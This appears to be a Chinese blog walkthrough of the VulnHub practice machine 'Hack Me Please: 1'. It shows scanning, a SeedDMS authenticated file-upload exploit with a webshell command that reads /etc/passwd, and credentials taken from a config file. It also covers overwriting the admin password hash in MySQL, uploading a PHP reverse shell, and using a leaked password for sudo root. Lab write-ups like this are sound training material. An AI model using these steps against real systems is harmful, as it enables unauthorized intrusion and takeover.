vulnhub刷题记录(Hack Me Please: 1)

本攻略介绍了一个名为“请黑我:1”的简单渗透测试练习环境。通过逐步指导,展示了如何发现并利用一个文件上传漏洞来获取root权限的过程。
  • 英文名称:Hack Me Please: 1
  • 中文名称:请黑我:1
  • 发布日期:2021 年 7 月 31 日
  • 难度:容易
  • 描述:一个完全为 OSCP 制作的简单盒子。不需要蛮力。目标:获取root shell
  • 下载地址https://www.vulnhub.com/entry/hack-me-please-1,731/

1、开机(Ubuntu_CTF)

dce678f92b54f177850c752d1ab4fde4.png
开机

2、主机发现(192.168.199.109)

932ff2359e4d7826a25389f77ad81197.jpeg
主机发现

3、端口扫描(80、3306)

989f8547915b61ca93bed1f894d6c01f.jpeg
端口扫描

4、web首页

Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker."
-Emmanuel Goldstein
大多数黑客都很年轻,因为年轻人往往适应能力强。 只要你保持适应能力,你就永远可以成为一名优秀的黑客。
——伊曼纽尔·戈德斯坦

96d5d5bda5ebe1a84945cf56e193cf8f.jpeg
web首页

5、查看源代码,在js注释中找到线索

cf862d87efe51381092bc9cb77cbe1b7.jpeg
查看源代码

6、访问页面

c5831bf2b3a7d41415557930e66f1f9e.jpeg
访问页面

7、查找漏洞

searchsploit SeedDMS 

0ef84f99274c7a9ef0e56c93aeabd1fb.jpeg
查找漏洞

8、查看漏洞简介

发现需要登录之后,才能利用文件上传漏洞

─# find / -name "47022.txt" 2>/dev/null
/usr/share/exploitdb/exploits/php/webapps/47022.txt
                                                                                                      
Step 1: Login to the application and under any folder add a document.
登录到应用程序并在任何文件夹下添加一个文档。
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
选择文档作为简单的 php 后门文件,或者可以使用任何后门/webshell。
Step 3: Now after uploading the file check the document id corresponding to the document.
现在上传文件后检查与文档对应的文档ID。
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
现在转到 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd 以在浏览器中获取命令响应。

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.   
注意:这里的“data”和“1048576”是保存上传文件的默认文件夹。

9、在conf/settings.xml中发现mysql的用户名密码

dbDatabase="seeddms" 
dbUser="seeddms" 
dbPass="seeddms" 

58a2dc7102b3e29ad125dc65bd7e7240.jpeg
conf 目录

10、登录mysql,查看web的用户名密码,发现登录不成功

use seeddms;
show tables;
select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+

46e70609b673988735e3fbcb068046fe.jpeg
查看users表

11、继续查看 tblUsers 表,找到admin的pwd

2f51a06f200e247d48d3b97a9c4dcbb5.jpeg
admin密码

12、在线破解md5[1],快如闪电(undefined应该是解密失败,尴尬),发现还是无法登录

undefined

f3e330fc62d82ae765dbfa500d9810eb.jpeg
破解md5

13、篡改md5值

└─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1
83b70504e0d8742dd5b66e6962eb8a35

update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin";
select login,pwd from tblUsers;

b14c12547d72c7e2e85fd73e1c00d223.jpeg
篡改md5

14、继续登录

10dbee7c1a0022b3e7bcb1f18b0a289d.jpeg
密码正确

15、上传反弹shell

使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本

└─# find / -name "php-reverse-shell.php" 2>/dev/null   
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/tmp/mozilla_ailx100/php-reverse-shell.php

8e09765c406bdde89e4a016c1bad8c6d.png
kali自带的php反弹shell脚本

48d42d36592ce643a430581b086a1c88.jpeg
修改IP地址和端口

1cede296f539fe447b1cc4113310a161.jpeg
上传成功

16、本地监听,再点击web页面的反弹shell

cfa8e6eb519b22672c40888db55e5e50.jpeg
反弹成功

47ad67daadb1cd172d020cae99487c8b.jpeg
最后文件名会被修改成 1.php

17、切换用户,使用users表中的用户名密码,sudo获得root权限

select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+

b0fd1035b63e0834bdf1a55583574916.jpeg
获得root权限

到此,实验完成~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ailx10

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值